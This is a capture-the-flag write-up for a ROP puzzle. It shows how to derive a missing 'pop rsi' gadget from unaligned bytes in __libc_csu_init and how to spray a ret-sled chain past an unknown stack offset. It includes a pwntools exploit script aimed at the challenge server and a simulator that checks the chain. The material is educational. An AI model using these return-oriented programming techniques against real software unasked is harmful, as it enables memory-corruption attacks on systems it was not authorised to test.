Tags: pwn rop 

Rating:

### Challenge ###

The challenge presents you with pieces to build a ROP chain, but is missing the stack offset and gadget to pop RSI.

```
Welcome to the ROP Puzzle!

Your goal is simple: you have to call the magic function as magic("/bin/cat", "flag.txt").

Here are the pieces:
Magic function: 0x560cb5cca240
flag.txt string : 0x560cb5ccb008
/bin/cat string : 0x560cb5ccb01c
pop rdi; ret gadget in __libc_csu_init : 0x560cb5cca3d3

It appears we're missing a piece. Can you ROP without it? Go ahead:
```

### Solution ###

In the standard `__libc_csu_init` epilogue, `pop rdi; ret` is really the unaligned tail (`5f c3`) of `pop r15; ret` (`41 5f c3`), and the `pop r14` (`41 5e`) immediately before it yields `pop rsi; pop r15; ret` (`5e 41 5f c3`) starting two bytes earlier. So `pop_rdi - 2` lets us set RSI (at the cost of one junk qword for r15), and `pop_rdi + 1` is a bare `ret`. Since we don't know the offset from the input buffer to the saved return address, we prepend 20 `ret` gadgets to the chain and spray many copies of it across the stack: wherever the return address lands inside a sled, execution slides down into the next copy of the real chain. Landing on one of the six non-sled qwords fails, so a longer sled means better odds; this also assumes the buffer is 8-byte aligned relative to the saved return address.

```python
from pwn import *

p = remote('challs.xmas.htsp.ro', 2006)
p.recvuntil(b"Magic function: ")
magic_func = int(p.recvline().strip(b'\n'),16)

p.recvuntil(b"flag.txt string : ")
flag_txt = int(p.recvline().strip(b'\n'),16)

p.recvuntil(b"/bin/cat string : ")
bin_cat = int(p.recvline().strip(b'\n'),16)

p.recvuntil(b"pop rdi; ret gadget in __libc_csu_init : ")
pop_rdi = int(p.recvline().strip(b'\n'),16)
pop_rsi = pop_rdi - 0x2  # pop rsi; pop r15; ret (5e 41 5f c3)
ret = pop_rdi + 0x1      # ret (c3)

p.recvuntil(b"It appears we're missing a piece. Can you ROP without it? Go ahead:")

chain = p64(ret)*20      # ret sled: any landing here slides into the chain below
chain += p64(pop_rdi)
chain += p64(bin_cat)    # rdi = "/bin/cat"
chain += p64(pop_rsi)
chain += p64(flag_txt)   # rsi = "flag.txt"
chain += p64(flag_txt)   # junk for r15
chain += p64(magic_func) # magic("/bin/cat", "flag.txt")

p.sendline(chain*150)
p.interactive()
```
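To check the two claims the solve script relies on (that `pop rsi; pop r15; ret` sits two bytes before `pop rdi; ret`, and that the ret sled makes the unknown stack offset mostly irrelevant), here is an added example that is not part of the original writeup. The `CSU_TAIL` bytes are constructed from gcc's standard `__libc_csu_init` epilogue, its load address is assumed from the `pop rdi` address printed above, and `simulate` is a toy ROP interpreter that only understands the gadgets in this chain.

```python
"""Verify the gadget deltas and measure how often the sprayed chain lands correctly."""
import struct

# Addresses exactly as the challenge printed them in this run (PIE, so they differ per connection).
MAGIC = 0x560cb5cca240
FLAG_TXT = 0x560cb5ccb008
BIN_CAT = 0x560cb5ccb01c
POP_RDI = 0x560cb5cca3d3

# Constructed: machine code of gcc's standard __libc_csu_init epilogue.
# add rsp,8 ; pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
CSU_TAIL = bytes.fromhex("4883c408" "5b" "5d" "415c" "415d" "415e" "415f" "c3")
# Assumption: the tail is loaded so that its "5f c3" bytes sit at POP_RDI.
CSU_TAIL_BASE = POP_RDI - CSU_TAIL.index(b"\x5f\xc3")


def find_gadgets(code: bytes, base: int) -> tuple:
    """Scan raw bytes for the unaligned gadgets hidden inside the REX-prefixed pops.

    `41 5f c3` is pop r15; ret, but one byte in, `5f c3` is pop rdi; ret.
    `41 5e 41 5f c3` is pop r14; pop r15; ret, and one byte in, `5e 41 5f c3`
    is pop rsi; pop r15; ret.  Returns (pop_rdi, pop_rsi) as absolute addresses.
    """
    return base + code.index(b"\x5f\xc3"), base + code.index(b"\x5e\x41\x5f\xc3")


def derive_gadgets(pop_rdi: int) -> tuple:
    """The shortcut the solve script uses: fixed deltas, no bytes needed.
    Returns (pop rsi; pop r15; ret, ret)."""
    return pop_rdi - 2, pop_rdi + 1


def build_chain(pop_rdi, magic, bin_cat, flag_txt, sled=20):
    """One copy of the chain as a list of qwords, ret sled first."""
    pop_rsi, ret = derive_gadgets(pop_rdi)
    #            rdi = bin_cat      rsi = flag_txt, r15 = junk
    return [ret] * sled + [pop_rdi, bin_cat, pop_rsi, flag_txt, flag_txt, magic]


def pack_payload(chain, copies=150) -> bytes:
    """Serialize the chain little-endian and spray it `copies` times, like the script does."""
    return b"".join(struct.pack("<Q", q) for q in chain) * copies


def simulate(stack, start, pop_rdi, magic):
    """Toy ROP interpreter: run from qword index `start` (where the overwritten
    return address happened to land) and return the (rdi, rsi) that magic() would
    receive, or None if execution 'crashes' by returning into a non-gadget value."""
    pop_rsi, ret = derive_gadgets(pop_rdi)
    rdi = rsi = None
    sp = start
    while sp < len(stack):
        target, sp = stack[sp], sp + 1
        if target == magic:
            return rdi, rsi
        if target == ret:
            continue                       # sled: slide to the next qword
        if target == pop_rdi:
            if sp >= len(stack):
                return None
            rdi, sp = stack[sp], sp + 1
        elif target == pop_rsi:
            if sp + 1 >= len(stack):
                return None
            rsi, sp = stack[sp], sp + 2    # second qword lands in r15 and is ignored
        else:
            return None                    # returned into a string address: segfault
    return None


def hit_rate(chain, pop_rdi, magic, bin_cat, flag_txt):
    """Fraction of landing positions within one copy that reach magic(bin_cat, flag_txt)."""
    stack = chain * 3                      # enough copies that a chain never runs off the end
    wins = sum(simulate(stack, i, pop_rdi, magic) == (bin_cat, flag_txt)
               for i in range(len(chain)))
    return wins / len(chain)


if __name__ == "__main__":
    print("scanned gadgets:", [hex(a) for a in find_gadgets(CSU_TAIL, CSU_TAIL_BASE)])
    print("derived gadgets:", [hex(a) for a in derive_gadgets(POP_RDI)])
    chain = build_chain(POP_RDI, MAGIC, BIN_CAT, FLAG_TXT)
    print("payload bytes:", len(pack_payload(chain)))
    print("hit rate per landing position:", hit_rate(chain, POP_RDI, MAGIC, BIN_CAT, FLAG_TXT))
```

The scan and the delta shortcut agree, and with a 20-qword sled in a 26-qword chain 21 of the 26 possible landing positions end in `magic("/bin/cat", "flag.txt")`: the sled plus the `pop rdi` qword itself. Landing on `pop rsi` reaches `magic` with RDI unset, and landing on a string address returns into data and crashes; a longer sled shrinks that window, which is the only reason for the 20 leading `ret`s.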
